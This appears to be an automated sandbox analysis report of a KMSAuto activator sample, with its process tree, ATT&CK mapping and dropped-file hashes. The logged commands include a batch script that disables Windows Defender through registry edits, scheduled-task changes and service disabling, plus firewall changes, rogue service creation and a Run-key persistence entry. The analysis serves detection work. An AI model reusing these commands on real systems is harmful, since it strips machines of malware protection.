reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
4⤵
PID:1524

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
3⤵
PID:896

C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
4⤵
PID:1740

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%' And PartialProductKey is Not NULL) get Name, Description, ID, PartialProductKey /FORMAT:List
3⤵
PID:1500

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
3⤵
PID:1812

C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
4⤵
PID:1744

C:\Windows\system32\slui.exe
"C:\Windows\Sysnative\slui.exe" 0x2a 0xC004C003
3⤵
PID:1308

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c sc.exe stop KMSEmulator
3⤵
PID:1620

C:\Windows\system32\sc.exe
sc.exe stop KMSEmulator
4⤵
- Launches sc.exe
PID:1880

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c sc.exe delete KMSEmulator
3⤵
PID:1244

C:\Windows\system32\sc.exe
sc.exe delete KMSEmulator
4⤵
- Launches sc.exe
PID:2012

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
3⤵
PID:512

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
4⤵
- Modifies Windows Firewall
PID:480

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
3⤵
PID:1300

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
4⤵
- Modifies Windows Firewall
PID:1336

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
3⤵
PID:1916

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
4⤵
- Modifies Windows Firewall
PID:1760

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
3⤵
PID:1596

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
4⤵
- Modifies Windows Firewall
PID:1156

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
3⤵
PID:1756

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
4⤵
- Modifies Windows Firewall
PID:1308

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
3⤵
PID:1448

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
4⤵
- Modifies Windows Firewall
PID:1516

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
3⤵
PID:988

C:\Windows\system32\sc.exe
sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
4⤵
- Launches sc.exe
PID:1244

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c sc.exe start KMSEmulator
3⤵
PID:1740

C:\Windows\system32\sc.exe
sc.exe start KMSEmulator
4⤵
- Launches sc.exe
PID:980

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
3⤵
PID:2044

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
4⤵
PID:1500

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
3⤵
PID:1724

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
4⤵
PID:1744

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
3⤵
PID:2000

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
4⤵
PID:1652

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
3⤵
PID:1868

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
4⤵
PID:1712

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
3⤵
PID:1272

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
4⤵
PID:1668

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
3⤵
PID:652

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
4⤵
PID:1896

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
3⤵
PID:1772

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
4⤵
PID:1252

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
3⤵
PID:1588

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
4⤵
PID:1324

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
3⤵
PID:1972

C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
4⤵
PID:320

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%' And PartialProductKey is Not NULL) get Name, Description, ID, PartialProductKey /FORMAT:List
3⤵
PID:688

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
3⤵
PID:1020

C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
4⤵
PID:2044

C:\Windows\system32\slui.exe
"C:\Windows\Sysnative\slui.exe" 0x2a 0xC004C003
3⤵
PID:976

C:\Users\Admin\microsoft tap driver.exe
"C:\Users\Admin\microsoft tap driver.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3EF5.tmp\3F05.tmp\3F16.bat "C:\Users\Admin\microsoft tap driver.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:928

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:1976

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:1020

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1428

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1156

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1924

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1416

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:480

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:1276

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:544

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:972

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:2040

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:316

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:1808

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:1972

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:396

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:1888

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:1636

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:956

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:1000

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:1760

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:980

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:928

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1896

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1976

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1020

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:892

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1284

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:296

C:\Users\Admin\svchost32.exe
"C:\Users\Admin\svchost32.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:1816

C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
"C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP
1⤵
- Executes dropped EXE
PID:1904

C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
"C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP
1⤵
- Executes dropped EXE
PID:896

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3EF5.tmp\3F05.tmp\3F16.bat
Filesize
3KB

MD5
3a981c51aac5475414f6dea9f4e6ae1a

SHA1
90fb6d188c3a6a04f9294fabc71f62635f0c3ea6

SHA256
f6498b247cc03e1599bb19fc49dabb923b675bdfb0fd2348f78861842624f809

SHA512
a8b49ee8606681f5559d3edddf1708df86f33b9029f140030037d4d2dff40bd288e0c69096be0ead4da4019c0ca5efcf81a33c7405bc82040fe833bb473f0e0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\signtool.exe
Filesize
323KB

MD5
05624e6d27eaef0db0673ae627bd6027

SHA1
b155c76bf59992a8d75d0e3a59dc94f24aff2591

SHA256
962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

SHA512
233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

Download Submit
C:\Users\Admin\AppData\Local\Temp\slmgr.vbs
Filesize
110KB

MD5
38482a5013d8ab40df0fb15eae022c57

SHA1
5a4a7f261307721656c11b5cc097cde1cf791073

SHA256
ac5c46b97345465a96e9ae1edaff44b191a39bf3d03dc1128090b8ffa92a16f8

SHA512
29c1348014ac448fb9c1a72bfd0ab16cdd62b628dc64827b02965b96ba851e9265c4426007181d2aa08f8fb7853142cc01fc6e4d89bec8fc25f3d340d3857331

Download Submit
C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
Filesize
33KB

MD5
757a99654e7709aa3ef33056fc3dc8eb

SHA1
d63430b034d1587793dcb5d738b8c3f612546118

SHA256
ed1aaeb33ea7f8bc4d7fec92dd592eed6192830764e89c3aafa08c075a176817

SHA512
517cbfd2f07d104ca4a2d38ee320f9bf961f3ea46cf5c3fdee5e6e20cc0e45ef4bf7119580febdd841b835144ae2701eeca8b5398daab8593a4a1b57535e1f04

Download Submit
C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
Filesize
33KB

MD5
757a99654e7709aa3ef33056fc3dc8eb

SHA1
d63430b034d1587793dcb5d738b8c3f612546118

SHA256
ed1aaeb33ea7f8bc4d7fec92dd592eed6192830764e89c3aafa08c075a176817

SHA512
517cbfd2f07d104ca4a2d38ee320f9bf961f3ea46cf5c3fdee5e6e20cc0e45ef4bf7119580febdd841b835144ae2701eeca8b5398daab8593a4a1b57535e1f04

Download Submit
C:\Users\Admin\KMSAuto_Files\bin\KMSSS.log
Filesize
773B

MD5
8535c4bbb7167c46ba65262945fe5c28

SHA1
311e55ffeaae1317c4cd83c9000f65082ae32c2d

SHA256
fbcbb6f17371066eb9b44303070cc0b1b2100b77195d1c6baebdd15a47691fda

SHA512
0285b927ad48960ef9581a3216475cdcef7d5df9807f294a247fc8dc75ee02c34ae927ddc02112befed9f22a75b3604b8ce416240b8d1e1f58d5b949b4299034

Download Submit
C:\Users\Admin\kms driver.exe
Filesize
46KB

MD5
5f3f77593b1a5bc4e96257a38a8666b1

SHA1
532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

SHA256
1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

SHA512
59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

Download Submit
C:\Users\Admin\kms driver.exe
Filesize
46KB

MD5
5f3f77593b1a5bc4e96257a38a8666b1

SHA1
532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

SHA256
1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

SHA512
59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

Download Submit
C:\Users\Admin\kmsauto++v1.6.4.exe
Filesize
17.2MB

MD5
f047284bfddc942292d93ed86fdb20fd

SHA1
56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

SHA256
793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

SHA512
2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

Download Submit
C:\Users\Admin\kmsauto++v1.6.4.exe
Filesize
17.2MB

MD5
f047284bfddc942292d93ed86fdb20fd

SHA1
56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

SHA256
793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

SHA512
2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

Download Submit
C:\Users\Admin\microsoft tap driver.exe
Filesize
59KB

MD5
e0b6a8a56069214d6dc31a2c053f73f7

SHA1
3eb13ab2e49014437c904f8ada2d22a85fd503e4

SHA256
4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

SHA512
080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

Download Submit
C:\Users\Admin\svchost32.exe
Filesize
533KB

MD5
4ec113ac1f8e7d4dda1270cc8bb00efc

SHA1
7a33598cab86959e8a3001ef0a2a756514de3aed

SHA256
7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

SHA512
28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

Download Submit
\Users\Admin\AppData\Local\Temp\signtool.exe
Filesize
323KB

MD5
05624e6d27eaef0db0673ae627bd6027

SHA1
b155c76bf59992a8d75d0e3a59dc94f24aff2591

SHA256
962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

SHA512
233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

Download Submit
\Users\Admin\AppData\Local\Temp\signtool.exe
Filesize
323KB

MD5
05624e6d27eaef0db0673ae627bd6027

SHA1
b155c76bf59992a8d75d0e3a59dc94f24aff2591

SHA256
962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

SHA512
233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

Download Submit
\Users\Admin\kms driver.exe
Filesize
46KB

MD5
5f3f77593b1a5bc4e96257a38a8666b1

SHA1
532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

SHA256
1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

SHA512
59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

Download Submit
\Users\Admin\kms driver.exe
Filesize
46KB

MD5
5f3f77593b1a5bc4e96257a38a8666b1

SHA1
532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

SHA256
1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

SHA512
59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

Download Submit
\Users\Admin\kms driver.exe
Filesize
46KB

MD5
5f3f77593b1a5bc4e96257a38a8666b1

SHA1
532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

SHA256
1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

SHA512
59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

Download Submit
\Users\Admin\kms driver.exe
Filesize
46KB

MD5
5f3f77593b1a5bc4e96257a38a8666b1

SHA1
532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

SHA256
1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

SHA512
59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

Download Submit
\Users\Admin\kmsauto++v1.6.4.exe
Filesize
17.2MB

MD5
f047284bfddc942292d93ed86fdb20fd

SHA1
56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

SHA256
793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

SHA512
2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

Download Submit
\Users\Admin\kmsauto++v1.6.4.exe
Filesize
17.2MB

MD5
f047284bfddc942292d93ed86fdb20fd

SHA1
56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

SHA256
793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

SHA512
2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

Download Submit
\Users\Admin\kmsauto++v1.6.4.exe
Filesize
17.2MB

MD5
f047284bfddc942292d93ed86fdb20fd

SHA1
56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

SHA256
793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

SHA512
2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

Download Submit
\Users\Admin\kmsauto++v1.6.4.exe
Filesize
17.2MB

MD5
f047284bfddc942292d93ed86fdb20fd

SHA1
56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

SHA256
793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

SHA512
2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

Download Submit
\Users\Admin\microsoft tap driver.exe
Filesize
59KB

MD5
e0b6a8a56069214d6dc31a2c053f73f7

SHA1
3eb13ab2e49014437c904f8ada2d22a85fd503e4

SHA256
4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

SHA512
080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

Download Submit
\Users\Admin\microsoft tap driver.exe
Filesize
59KB

MD5
e0b6a8a56069214d6dc31a2c053f73f7

SHA1
3eb13ab2e49014437c904f8ada2d22a85fd503e4

SHA256
4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

SHA512
080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

Download Submit
\Users\Admin\microsoft tap driver.exe
Filesize
59KB

MD5
e0b6a8a56069214d6dc31a2c053f73f7

SHA1
3eb13ab2e49014437c904f8ada2d22a85fd503e4

SHA256
4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

SHA512
080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

Download Submit
\Users\Admin\svchost32.exe
Filesize
533KB

MD5
4ec113ac1f8e7d4dda1270cc8bb00efc

SHA1
7a33598cab86959e8a3001ef0a2a756514de3aed

SHA256
7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

SHA512
28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

Download Submit
\Users\Admin\svchost32.exe
Filesize
533KB

MD5
4ec113ac1f8e7d4dda1270cc8bb00efc

SHA1
7a33598cab86959e8a3001ef0a2a756514de3aed

SHA256
7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

SHA512
28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

Download Submit
\Users\Admin\svchost32.exe
Filesize
533KB

MD5
4ec113ac1f8e7d4dda1270cc8bb00efc

SHA1
7a33598cab86959e8a3001ef0a2a756514de3aed

SHA256
7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

SHA512
28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

Download Submit
